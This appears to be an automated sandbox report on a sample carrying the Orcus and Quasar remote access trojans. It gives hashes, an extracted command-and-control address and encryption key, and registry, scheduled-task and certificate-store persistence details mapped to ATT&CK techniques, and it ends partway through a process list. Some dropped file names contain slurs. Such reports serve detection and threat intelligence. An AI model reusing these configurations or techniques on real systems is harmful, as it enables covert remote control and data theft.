orcus | bc3281aba1987ec4b1d4d68e99c8b6829d4fd54477db001bf331971b72789195

Analysis

max time kernel
97s
max time network
96s
platform
windows11-21h2_x64
resource
win11-20250411-en
resource tags

arch:x64arch:x86image:win11-20250411-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 05:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootkitBuilded.exe
Size

2.0MB
MD5

99b124439bde7f750accb3a558644341
SHA1

09e26808c12e4d0508a7387b6ff59a745889568e
SHA256

bc3281aba1987ec4b1d4d68e99c8b6829d4fd54477db001bf331971b72789195
SHA512

9c01de8d170de66471aa37ab47bf3817580e152e82879523771a875be114a95b33a33b35d8ab512dea4a68568a8ef635c29f34a33cffb283ed422b4e29562cdf
SSDEEP

49152:PevRj2WXGkpogEPw0GuUUKqCMnFe3FSgEEEbJ:PEZLXz70G0AIKNS

Score

10^/10

orcus quasar discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

orcus

213.209.143.58:2095

Mutex

8a98b570ecf9411bb051e6383f4a23c4

Attributes

autostart_method
Registry
enable_keylogger
false
install_path
%programfiles%\Orcus\Orcus.exe
reconnect_delay
10000
registry_keyname
Orcus
taskscheduler_taskname
Orcus
watchdog_path
AppData\OrcusWatchdog.exe

Extracted

Family

quasar

Attributes

encryption_key
B3E34BC740FE48138878D8FFE23478A44299D77B
reconnect_delay
3000

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus

Orcus main payload 1 IoCs

resource	yara_rule
behavioral2/files/0x004a00000002b150-32.dat	family_orcus

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x001a00000002b14c-15.dat	family_quasar
behavioral2/memory/3424-34-0x0000027F7C910000-0x0000027F7CA9E000-memory.dmp	family_quasar

Orcurs Rat Executable 3 IoCs

resource	yara_rule
behavioral2/files/0x004a00000002b150-32.dat	orcus
behavioral2/memory/764-37-0x0000000000F10000-0x0000000000FF8000-memory.dmp	orcus
behavioral2/memory/5928-1030-0x0000000000EC0000-0x0000000000FA8000-memory.dmp	orcus

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Executes dropped EXE 9 IoCs

pid	Process
352	Install.exe
3424	$77nigga.exe
764	jew.exe
5324	Orcus.exe
4624	notfud.exe
5960	Orcus.exe
464	OrcusWatchdog.exe
5896	OrcusWatchdog.exe
5928	Orcus.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2316063146-1984817004-4437738-1000\Software\Microsoft\Windows\CurrentVersion\Run\Orcus = "\"C:\\Program Files (x86)\\Orcus\\Orcus.exe\""	Orcus.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4396	powershell.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\notfud	svchost.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Orcus\Orcus.exe	jew.exe
File created	C:\Program Files (x86)\Orcus\Orcus.exe.config	jew.exe
File created	C:\Program Files (x86)\Orcus\Orcus.exe	jew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Orcus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Orcus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OrcusWatchdog.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OrcusWatchdog.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Orcus.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
5388	cmd.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	notfud.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	notfud.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION	wmiprvse.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4840	schtasks.exe
3012	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4624	notfud.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4396	powershell.exe
4396	powershell.exe
4396	powershell.exe
628	winlogon.exe
628	winlogon.exe
5324	Orcus.exe
5324	Orcus.exe
5896	OrcusWatchdog.exe
5896	OrcusWatchdog.exe
5324	Orcus.exe
5896	OrcusWatchdog.exe
5324	Orcus.exe
5896	OrcusWatchdog.exe
5324	Orcus.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
5528	wmiprvse.exe
5324	Orcus.exe
5896	OrcusWatchdog.exe
5896	OrcusWatchdog.exe
5324	Orcus.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
5528	wmiprvse.exe
5528	wmiprvse.exe
5528	wmiprvse.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
5896	OrcusWatchdog.exe
628	winlogon.exe
5324	Orcus.exe
5324	Orcus.exe
5896	OrcusWatchdog.exe
628	winlogon.exe
4624	notfud.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
628	winlogon.exe
5528	wmiprvse.exe
628	winlogon.exe
628	winlogon.exe
5324	Orcus.exe
5896	OrcusWatchdog.exe
4624	notfud.exe
628	winlogon.exe
628	winlogon.exe
5528	wmiprvse.exe
628	winlogon.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3320	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3424	$77nigga.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	4624	notfud.exe
Token: SeDebugPrivilege	5324	Orcus.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	628	winlogon.exe
Token: SeDebugPrivilege	464	OrcusWatchdog.exe
Token: SeDebugPrivilege	5896	OrcusWatchdog.exe
Token: SeShutdownPrivilege	3320	Explorer.EXE
Token: SeCreatePagefilePrivilege	3320	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2572	svchost.exe
Token: SeIncreaseQuotaPrivilege	2572	svchost.exe
Token: SeSecurityPrivilege	2572	svchost.exe
Token: SeTakeOwnershipPrivilege	2572	svchost.exe
Token: SeLoadDriverPrivilege	2572	svchost.exe
Token: SeSystemtimePrivilege	2572	svchost.exe
Token: SeBackupPrivilege	2572	svchost.exe
Token: SeRestorePrivilege	2572	svchost.exe
Token: SeShutdownPrivilege	2572	svchost.exe
Token: SeSystemEnvironmentPrivilege	2572	svchost.exe
Token: SeUndockPrivilege	2572	svchost.exe
Token: SeManageVolumePrivilege	2572	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2572	svchost.exe
Token: SeIncreaseQuotaPrivilege	2572	svchost.exe
Token: SeSecurityPrivilege	2572	svchost.exe
Token: SeTakeOwnershipPrivilege	2572	svchost.exe
Token: SeLoadDriverPrivilege	2572	svchost.exe
Token: SeSystemtimePrivilege	2572	svchost.exe
Token: SeBackupPrivilege	2572	svchost.exe
Token: SeRestorePrivilege	2572	svchost.exe
Token: SeShutdownPrivilege	2572	svchost.exe
Token: SeSystemEnvironmentPrivilege	2572	svchost.exe
Token: SeUndockPrivilege	2572	svchost.exe
Token: SeManageVolumePrivilege	2572	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2572	svchost.exe
Token: SeIncreaseQuotaPrivilege	2572	svchost.exe
Token: SeSecurityPrivilege	2572	svchost.exe
Token: SeTakeOwnershipPrivilege	2572	svchost.exe
Token: SeLoadDriverPrivilege	2572	svchost.exe
Token: SeSystemtimePrivilege	2572	svchost.exe
Token: SeBackupPrivilege	2572	svchost.exe
Token: SeRestorePrivilege	2572	svchost.exe
Token: SeShutdownPrivilege	2572	svchost.exe
Token: SeSystemEnvironmentPrivilege	2572	svchost.exe
Token: SeUndockPrivilege	2572	svchost.exe
Token: SeManageVolumePrivilege	2572	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2572	svchost.exe
Token: SeIncreaseQuotaPrivilege	2572	svchost.exe
Token: SeSecurityPrivilege	2572	svchost.exe
Token: SeTakeOwnershipPrivilege	2572	svchost.exe
Token: SeLoadDriverPrivilege	2572	svchost.exe
Token: SeSystemtimePrivilege	2572	svchost.exe
Token: SeBackupPrivilege	2572	svchost.exe
Token: SeRestorePrivilege	2572	svchost.exe
Token: SeShutdownPrivilege	2572	svchost.exe
Token: SeSystemEnvironmentPrivilege	2572	svchost.exe
Token: SeUndockPrivilege	2572	svchost.exe
Token: SeManageVolumePrivilege	2572	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2572	svchost.exe
Token: SeIncreaseQuotaPrivilege	2572	svchost.exe
Token: SeSecurityPrivilege	2572	svchost.exe
Token: SeTakeOwnershipPrivilege	2572	svchost.exe
Token: SeLoadDriverPrivilege	2572	svchost.exe
Token: SeSystemtimePrivilege	2572	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5324	Orcus.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
5324	Orcus.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5360 wrote to memory of 352	5360	BootkitBuilded.exe	79
PID 5360 wrote to memory of 352	5360	BootkitBuilded.exe	79
PID 5360 wrote to memory of 352	5360	BootkitBuilded.exe	79
PID 5360 wrote to memory of 3424	5360	BootkitBuilded.exe	80
PID 5360 wrote to memory of 3424	5360	BootkitBuilded.exe	80
PID 5360 wrote to memory of 764	5360	BootkitBuilded.exe	82
PID 5360 wrote to memory of 764	5360	BootkitBuilded.exe	82
PID 5360 wrote to memory of 764	5360	BootkitBuilded.exe	82
PID 5388 wrote to memory of 4396	5388	cmd.exe	83
PID 5388 wrote to memory of 4396	5388	cmd.exe	83
PID 764 wrote to memory of 5324	764	jew.exe	85
PID 764 wrote to memory of 5324	764	jew.exe	85
PID 764 wrote to memory of 5324	764	jew.exe	85
PID 3424 wrote to memory of 4840	3424	$77nigga.exe	86
PID 3424 wrote to memory of 4840	3424	$77nigga.exe	86
PID 3424 wrote to memory of 4624	3424	$77nigga.exe	90
PID 3424 wrote to memory of 4624	3424	$77nigga.exe	90
PID 2468 wrote to memory of 5960	2468	cmd.exe	92
PID 2468 wrote to memory of 5960	2468	cmd.exe	92
PID 2468 wrote to memory of 5960	2468	cmd.exe	92
PID 4396 wrote to memory of 628	4396	powershell.exe	5
PID 628 wrote to memory of 688	628	winlogon.exe	7
PID 628 wrote to memory of 980	628	winlogon.exe	12
PID 628 wrote to memory of 412	628	winlogon.exe	13
PID 628 wrote to memory of 536	628	winlogon.exe	14
PID 628 wrote to memory of 700	628	winlogon.exe	15
PID 628 wrote to memory of 892	628	winlogon.exe	16
PID 5324 wrote to memory of 464	5324	Orcus.exe	93
PID 5324 wrote to memory of 464	5324	Orcus.exe	93
PID 5324 wrote to memory of 464	5324	Orcus.exe	93
PID 688 wrote to memory of 2504	688	lsass.exe	44
PID 628 wrote to memory of 1076	628	winlogon.exe	17
PID 628 wrote to memory of 1136	628	winlogon.exe	19
PID 628 wrote to memory of 1144	628	winlogon.exe	20
PID 628 wrote to memory of 1260	628	winlogon.exe	21
PID 628 wrote to memory of 1288	628	winlogon.exe	22
PID 628 wrote to memory of 1356	628	winlogon.exe	23
PID 628 wrote to memory of 1384	628	winlogon.exe	24
PID 628 wrote to memory of 1404	628	winlogon.exe	25
PID 628 wrote to memory of 1420	628	winlogon.exe	26
PID 628 wrote to memory of 1456	628	winlogon.exe	27
PID 628 wrote to memory of 1596	628	winlogon.exe	28
PID 628 wrote to memory of 1652	628	winlogon.exe	29
PID 628 wrote to memory of 1748	628	winlogon.exe	30
PID 628 wrote to memory of 1772	628	winlogon.exe	31
PID 628 wrote to memory of 1848	628	winlogon.exe	32
PID 4624 wrote to memory of 3012	4624	notfud.exe	94
PID 4624 wrote to memory of 3012	4624	notfud.exe	94
PID 688 wrote to memory of 2504	688	lsass.exe	44
PID 628 wrote to memory of 1992	628	winlogon.exe	33
PID 688 wrote to memory of 2504	688	lsass.exe	44
PID 464 wrote to memory of 5896	464	OrcusWatchdog.exe	96
PID 464 wrote to memory of 5896	464	OrcusWatchdog.exe	96
PID 464 wrote to memory of 5896	464	OrcusWatchdog.exe	96
PID 688 wrote to memory of 2504	688	lsass.exe	44
PID 628 wrote to memory of 2000	628	winlogon.exe	34
PID 628 wrote to memory of 1916	628	winlogon.exe	35
PID 628 wrote to memory of 1936	628	winlogon.exe	36
PID 628 wrote to memory of 2124	628	winlogon.exe	37
PID 628 wrote to memory of 2284	628	winlogon.exe	39
PID 628 wrote to memory of 2364	628	winlogon.exe	40
PID 628 wrote to memory of 2372	628	winlogon.exe	41
PID 628 wrote to memory of 2396	628	winlogon.exe	42
PID 628 wrote to memory of 2444	628	winlogon.exe	43

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:412

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1076
- C:\Program Files (x86)\Orcus\Orcus.exe
  "C:\Program Files (x86)\Orcus\Orcus.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1356
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1772

C:\Windows\system32\svchost.exe
